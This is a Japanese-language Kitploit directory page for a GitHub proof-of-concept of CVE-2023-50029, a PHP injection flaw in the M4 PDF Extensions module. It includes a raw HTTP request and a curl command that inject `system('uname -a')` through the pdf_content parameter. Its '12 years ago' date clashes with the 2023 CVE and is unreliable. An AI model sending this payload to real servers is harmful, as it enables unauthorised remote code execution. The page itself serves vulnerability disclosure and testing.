Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
PHP-Injection-in-M4-PDF-Extensions — CVE-2023-50029: M4 PDF Extensions Module における PHP インジェクションの脆弱性 | Kitploit
ツール/GitHubGitHub/absholi7ly/php-injection-in-m4-pdf-extensions
脆弱性分析コード分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHubabsholi7ly/php-injection-in-m4-pdf-extensions

PHP-Injection-in-M4-PDF-Extensions

CVE-2023-50029: M4 PDF Extensions Module における PHP インジェクションの脆弱性

リポジトリを見る
12年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

PHP-Injection-in-M4-PDF-Extensions

CVE-2023-50029 は、M4 PDF Extensions モジュールにおける PHP インジェクションの脆弱性です。この脆弱性により、攻撃者はサーバー上で任意の PHP コードを注入・実行でき、標的のシステムを完全に制御できるようになります。この問題は入力の検証が不適切であることに起因しており、悪意のあるコードがユーザーパラメータを介して渡されることを可能にします。

Poc

root@kitploit:~
POST /generate_pdf.php HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 59

pdf_content=<?php system('uname -a'); ?>

または Curl

root@kitploit:~
curl -X POST http://example.com/generate_pdf.php -d "pdf_content=<?php system('uname -a'); ?>"
ツールをダウンロード